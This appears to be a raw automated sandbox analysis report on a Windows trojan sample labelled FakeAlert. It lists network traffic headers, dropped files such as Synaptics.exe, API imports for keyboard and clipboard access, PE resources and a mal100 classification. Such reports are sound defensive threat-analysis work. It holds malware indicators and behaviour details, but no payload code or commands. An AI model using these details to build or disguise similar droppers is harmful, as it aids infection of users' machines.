Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-3TPsn48xaQPKkGwymNjxxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2zZqCf538bpNUCHh-XV8Lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: script-src 'report-sample' 'nonce-xLDmZzE8U_Q17M8WWwO6Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-q_WwuXe4XGTluFaUH4GtEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-j4jchXbwVQLmIeHkuwST4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Content-Security-Policy: script-src 'report-sample' 'nonce-F69_pKNlsi_vh4bFmrC-yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-00CzyXufRNr6eJhID_c9KA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EOvmVxVbQaFC3tSzPkmSHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: Synaptics.exe, 00000009.00000003.342497057.00000000054F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.comdeveloper.android.google.cndevelopers.android.google.cnsource.android.google.cn equals www.youtube.com (Youtube)
Source: unknown HTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49737 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0043C1FC GetKeyboardState, 6_2_0043C1FC
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 7_2_00405809
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004289FC GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 6_2_004289FC
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00429040 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 12_2_00429040
Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004601F0 6_2_004601F0
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0046C7CC 6_2_0046C7CC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0048C7F4 6_2_0048C7F4
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0044EA40 6_2_0044EA40
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00496E18 6_2_00496E18
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0046B1E4 6_2_0046B1E4
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0045FCC8 6_2_0045FCC8
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00453DA4 6_2_00453DA4
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_00406D5F 7_2_00406D5F
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_687E1BFF 7_2_687E1BFF
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_004601F0 9_2_004601F0
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0046C7CC 9_2_0046C7CC
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0048C7F4 9_2_0048C7F4
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0044EA40 9_2_0044EA40
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00496E18 9_2_00496E18
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0046B1E4 9_2_0046B1E4
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0045FCC8 9_2_0045FCC8
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_00453DA4 9_2_00453DA4
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_004601F0 12_2_004601F0
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0046C7CC 12_2_0046C7CC
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0048C7F4 12_2_0048C7F4
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0044EA40 12_2_0044EA40
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00496E18 12_2_00496E18
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0046B1E4 12_2_0046B1E4
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0045FCC8 12_2_0045FCC8
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_00453DA4 12_2_00453DA4
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Process Stats: CPU usage > 98%
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: uniformerede.exe.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ._cache_uniformerede.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Synaptics.exe.6.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: RCXCD96.tmp.6.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: YC9w8Aif.exe.9.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: RCXDA77.tmp.9.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: RCXF979.tmp.9.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ~$cache1.9.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Section loaded: starttiledata.dll
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\._cache_uniformerede.exe Code function: 7_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 7_2_00403640
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: String function: 00406CDC appears 32 times
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: String function: 004049E4 appears 40 times
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: String function: 0049058C appears 112 times
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: String function: 00404A58 appears 34 times
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: String function: 004109E8 appears 68 times
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: String function: 004049C0 appears 117 times
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: String function: 004865B4 appears 38 times
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: String function: 00486788 appears 32 times
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: String function: 004070F0 appears 168 times
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: String function: 00404CCC appears 108 times
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: String function: 004967D4 appears 36 times
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: String function: 00403F78 appears 32 times
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: String function: 0040F7A4 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: String function: 0049058C appears 56 times
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: String function: 004109E8 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: String function: 004049C0 appears 73 times
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: String function: 004070F0 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: String function: 00404CCC appears 54 times
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0043F118 NtdllDefWindowProc_A,GetCapture, 6_2_0043F118
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_004598AC NtdllDefWindowProc_A, 6_2_004598AC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 6_2_0045A054
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 6_2_0045A104
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A, 6_2_0045E9EC
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,73C9B080,SaveDC,RestoreDC,NtdllDefWindowProc_A, 6_2_0044EA40
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_0042F60C NtdllDefWindowProc_A, 6_2_0042F60C
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0043F118 NtdllDefWindowProc_A,GetCapture, 9_2_0043F118
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_004598AC NtdllDefWindowProc_A, 9_2_004598AC
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 9_2_0045A054
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 9_2_0045A104
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A, 9_2_0045E9EC
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,73C9B080,SaveDC,RestoreDC,NtdllDefWindowProc_A, 9_2_0044EA40
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 9_2_0042F60C NtdllDefWindowProc_A, 9_2_0042F60C
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0043F118 NtdllDefWindowProc_A,GetCapture, 12_2_0043F118
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_004598AC NtdllDefWindowProc_A, 12_2_004598AC
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 12_2_0045A054
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 12_2_0045A104
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A, 12_2_0045E9EC
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, 12_2_0044EA40
Source: C:\ProgramData\Synaptics\Synaptics.exe Code function: 12_2_0042F60C NtdllDefWindowProc_A, 12_2_0042F60C
Source: uniformerede.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Source: uniformerede.exe.0.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: Synaptics.exe.6.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Source: Synaptics.exe.6.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCXCD96.tmp.6.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: YC9w8Aif.exe.9.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCXDA77.tmp.9.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: RCXDA77.tmp.9.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RCXF979.tmp.9.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: RCXF979.tmp.9.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: ~$cache1.9.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameb! vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr Binary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.dr Binary or memory string: OriginalFilenameb! vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220527
Source: classification engine Classification label: mal100.troj.evad.winEXE@21/60@6/2
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00425FB8 GetLastError,FormatMessageA, 6_2_00425FB8
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ProgramData\Synaptics\Synaptics.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
